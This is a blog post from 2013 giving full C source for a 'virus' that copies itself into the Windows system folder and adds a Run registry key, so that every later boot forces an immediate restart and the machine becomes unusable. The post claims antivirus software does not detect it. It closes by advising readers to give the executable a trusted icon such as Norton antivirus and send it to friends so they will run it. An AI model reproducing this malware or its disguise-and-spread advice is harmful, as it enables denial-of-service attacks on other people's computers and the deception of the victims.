Which Anti Virus

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Wednesday, 10 April 2013

A Virus Program to Restart the Computer at Every Startup (DANGEROUS TO USE)

Posted on 08:39 by Unknown

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded. 
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C languagethen it’s too easy to understand the logic behind the coding. 
Here is the source code. 


#include<stdio.h>
#include<conio.h>
#include<math.h>
int found,drive_no;char buff[128]; 
void findroot() 
{ 
int done; 
struct ffblk ffblk; //File block structure 
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive 
if(done==0) 
{ 
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not 
if(done==0) 
{ 
found=1; //means that the system is already infected 
return; 
} 
drive_no=1; 
return; 
} 
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC); 
if(done==0) 
{ 
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0); 
if 
(done==0) 
{ 
found=1;return; 
} 
drive_no=2; 
return; 
} 
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC); 
if(done==0) 
{ 
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0); 
if(done==0) 
{ 
found=1; 
return; 
} 
drive_no=3; 
return; 
} 
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC); 
if(done==0) 
{ 
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0); 
if(done==0) 
{ 
found=1; 
return; 
} 
drive_no=4; 
return; 
} 
else 
exit(0); 
} 
void main() 
{ 
FILE *self,*target; 
findroot(); 
if(found==0) //if the system is not already infected 
{ 
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no) 
{ 
case 1: 
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place 
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ 
CurrentVersion\\Run \/v sres \/t REG_SZ \/d 
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup 
break; 
case 2: 
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”); 
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ 
CurrentVersion\\Run \/v sres \/t REG_SZ \/d 
D:\\windows\\system\\sysres.exe”); 
break; 
case 3: 
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”); 
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ 
CurrentVersion\\Run \/v sres \/t REG_SZ \/d 
E:\\windows\\system\\sysres.exe”); 
break; 
case 4: 
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”); 
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ 
CurrentVersion\\Run \/v sres \/t REG_SZ \/d 
F:\\windows\\system\\sysres.exe”); 
break; 
default: 
exit(0); 
} 
while(fread(buff,1,1,self)>0) 
fwrite(buff,1,1,target); 
fcloseall(); 
} 
else 
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart} 


NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR. 
Testing And Removing The Virus From Your PC 

You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again. 
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps. 

1. Reboot your computer in the SAFE MODE 
2. Goto X:\Windows\System (X can be C,D,E or F) 
3.You will find a file by name sysres.exe, delete it. 
4.Type regedit in run.You will goto registry editor.Here navigate to 
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run 

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully. 
Logic Behind The Working Of The Virus 

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments. 

LOGIC: 
1. First the virus will find the Root partition (Partition on which Windows is installed). 

2. Next it will determine whether the Virus file is already copied(Already infected) 
intoX:\Windows\System 

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup. 

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer. 

This process is repeated every time the PC is restarted. 
NOTE: The system will not be restarted as soon as you double click the Sysres.exefile.The restarting process will occur from the next boot of the system. 
AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional) 
After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive. 
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in Hacking | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • Online Mobile Recharge Websites
    Hey here is the list of websites which helps you to make a online recharge of your mobile. Rechargeitnow.com FastRecharge.com Indiamobilerec...
  • GTU Paper Solution and Material as Per GTU syllabus
    Go to this website and download the Study material of GTU Syllabus. http://gtu-paper.blogspot.com/
  • C Program Library files(Header Files)
    1. <stdio.h>: input and output  function in program. 2. <conio.h>: to clear screen and  pause information function. 3. <ctype...
  • Windows 8 - Keyboard shortcuts
    Press this key To do this Right Shift for eight seconds Turn Filter Keys on and off Left Alt+Left Shift+PrtScn (or PrtScn) Turn High Contras...
  • How To Install Android on PC or Laptop
    Android has a got very important place in our Tech World.Now in market you can get many devices running on Android like Smartphones to Table...
  • HOW TO : Speed Up Youtube Buffering Speed
    1. Click start then type  system.ini  in the input address box 2. Then you will see the file  system.ini,  click it and it will open in a no...
  • Different Operating System and Their RAM Support
    Windows 8 64 bit Enterprise  Professional : 512 GB Windows 8 64 bit :128 GB Windows 8 32 bit : 4 GB Windows 7 64 bit Ultimate, Enterprise ...
  • Make Calculator Yourself using java.
    write a following code in netbeans IDE 7.1 and save file as calc.java and run it and you will have your own calculator...  /*  * To change t...
  • How To recover Saved Password In Firefox ?
    1. Open Firefox Web Broweser 2. Then Click on FireFox > Option > Option as shown in below picture 3. Then a POP Up box will appear, In...
  • How To Check Antivirus Strength or Test Antivirus Software or Check Antivirus Which is Used by You is Good or Worst?
    One of the most asked question is  Which antivirus has good strength or How to check antivirus strength? This post is for them who want to c...

Categories

  • Android
  • Android Apps
  • apps
  • BlackBerry
  • Cprog
  • dfd
  • erd
  • Facebook
  • general
  • Hacking
  • HTC
  • ios
  • java
  • Mobile
  • nokia
  • Samsung
  • Srs
  • Window Apps
  • Windows 8

Blog Archive

  • ▼  2013 (91)
    • ►  November (6)
    • ►  October (5)
    • ►  September (17)
    • ►  August (3)
    • ►  July (8)
    • ►  June (13)
    • ►  May (12)
    • ▼  April (27)
      • Windows 8 - Keyboard shortcuts
      • HTC 8x
      • Cool Wallpapers HD : Get it free
      • Gun N Strike Terrorist : Get it free
      • Temple Run For Windows Mobile
      • BOUNDRY_FILL ALGORITHM
      • E-R Diagram For Airlines Reservation System
      • E-R Diagram For Hospital Management System
      • Bypass School/College/Office Firewall
      • How to Hackers Erase Tracks After Hacking
      • Creating a fake ( Phishing ) page of gmail,faceboo...
      • Recover Password Of --> Linux Ubuntu , Windows XP,...
      • A Virus Program to Restart the Computer at Every S...
      • How To Protect Your Computer From Keyloggers
      • How to get a admin account on a school / Collage PC
      • Increase Firefox Surfing Speed
      • Blocking Ultrasurf with a Sonicwall Firewall
      • Hacking Aspx / Php websites (ACTIVE SQL INJECTION)
      • Will Facebook’s phone gamble with ANDROID / WINDOW...
      • HOW TO : Speed Up Youtube Buffering Speed
      • SRS For Hospital Management System
      • SRS for Library Management System
      • Hack Your Modem and Increase Your Download Speed
      • BlackBerry Z10 coming soon with WXGA resolution
      • Samsung Galaxy Pocket Neo and Galaxy Star with Jel...
      • Loop Mobile DND | Activate Loop Mobile Do Not Dist...
      • Hacking Cyberoam(Bypassing)
Powered by Blogger.

About Me

Unknown
View my complete profile